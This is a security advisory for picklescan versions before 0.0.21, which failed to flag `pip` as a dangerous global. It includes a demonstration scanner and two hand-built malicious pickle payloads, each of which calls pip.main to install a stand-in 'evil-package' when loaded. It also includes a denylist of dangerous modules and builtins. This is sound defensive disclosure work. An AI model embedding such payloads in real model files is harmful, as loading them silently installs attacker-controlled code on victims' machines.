
PYSEC-2025-18

Details

picklescan before 0.0.21 does not treat `pip` as an unsafe global. An attacker could craft a malicious model whose pickle payload calls `pip.main()` to fetch and install an attacker-controlled package from PyPI (hosted, for example, on pypi.org or GitHub). Because `pip` was not on picklescan's list of restricted globals, such a model passed the scan and appeared safe, even though loading it would drive pip to install the attacker's package on the victim's machine.
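To make the gap concrete, the following is an added illustration, not picklescan's code: a minimal picklescan-style scanner that walks pickle opcodes and compares every referenced global against a denylist, run over a hand-built payload that calls `pip.main(["install", "evil-package"])`. The payload bytes, the package name, and the contents of the two denylists are constructed for this example (the "before" list stands in for a table that lacks `pip`, the "after" list for one that has it; neither reproduces picklescan's real table). Nothing is ever unpickled: `pickletools.genops` only parses opcodes, so the file is safe to run.

```python
"""Toy picklescan-style global check: why a missing `pip` denylist entry
lets a pip.main() payload through. Example code, not picklescan's own."""
import pickletools

# Constructed payload, protocol 0 opcodes:
#   GLOBAL pip.main, MARK, MARK, STRING, STRING, LIST, TUPLE, REDUCE, STOP
# On pickle.loads this would call pip.main(['install', 'evil-package']).
PAYLOAD_PROTO0 = (
    b"cpip\nmain\n"
    b"((S'install'\nS'evil-package'\nl"
    b"tR."
)

# The same call encoded with protocol-4 opcodes; here the module and name
# arrive as string operands followed by STACK_GLOBAL instead of GLOBAL.
PAYLOAD_PROTO4 = (
    b"\x80\x04"                       # PROTO 4
    b"\x8c\x03pip\x8c\x04main\x93"    # SHORT_BINUNICODE 'pip', 'main'; STACK_GLOBAL
    b"]("                             # EMPTY_LIST, MARK
    b"\x8c\x07install\x8c\x0cevil-package"
    b"e"                              # APPENDS
    b"\x85R."                         # TUPLE1, REDUCE, STOP
)

# Illustrative denylists (module -> "*" for any attribute, or a set of names).
# Only the presence or absence of the `pip` entry matters for this advisory.
UNSAFE_GLOBALS_BEFORE = {
    "os": "*", "posix": "*", "nt": "*", "subprocess": "*",
    "socket": "*", "shutil": "*", "sys": "*",
    "builtins": {"eval", "exec", "compile", "open", "__import__"},
}
UNSAFE_GLOBALS_AFTER = dict(UNSAFE_GLOBALS_BEFORE, pip="*")


def extract_globals(data: bytes) -> list[tuple[str, str]]:
    """Return every (module, name) the pickle references via GLOBAL or STACK_GLOBAL.

    STACK_GLOBAL takes its module and name from the two most recent string
    operands; tracking only those strings is a simplification of full stack
    emulation that is sufficient for these payloads.
    """
    found: list[tuple[str, str]] = []
    recent_strings: list[str] = []
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":
            module, name = arg.split(" ", 1)   # genops yields "module name"
            found.append((module, name))
        elif op.name == "STACK_GLOBAL":
            if len(recent_strings) < 2:
                raise ValueError("STACK_GLOBAL without two preceding string operands")
            found.append((recent_strings[-2], recent_strings[-1]))
        elif op.name in ("SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"):
            recent_strings.append(arg)
    return found


def scan(data: bytes, unsafe_globals: dict) -> list[tuple[str, str]]:
    """Return the dangerous globals found; an empty list means the scan passes."""
    hits = []
    for module, name in extract_globals(data):
        flagged = unsafe_globals.get(module)
        if flagged == "*" or (flagged is not None and name in flagged):
            hits.append((module, name))
    return hits


if __name__ == "__main__":
    for label, payload in (("proto0", PAYLOAD_PROTO0), ("proto4", PAYLOAD_PROTO4)):
        print(label, "globals:", extract_globals(payload))
        print(label, "before fix:", scan(payload, UNSAFE_GLOBALS_BEFORE) or "PASSES (missed)")
        print(label, "after fix: ", scan(payload, UNSAFE_GLOBALS_AFTER))
```

The two payloads show the same `pip.main` reference through both opcode forms a scanner has to understand; with the `pip` entry absent, `scan` returns nothing for either encoding and the model "passes", and with it present both are flagged.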


Affected packages

PyPI / picklescan
Introduced in: 0 (all earlier releases) Fixed in: 0.0.21 (commit 78ce704227c51f070c0c5fb4b466d92c62a7aa3d)
Fix: pip install --upgrade 'picklescan>=0.0.21'
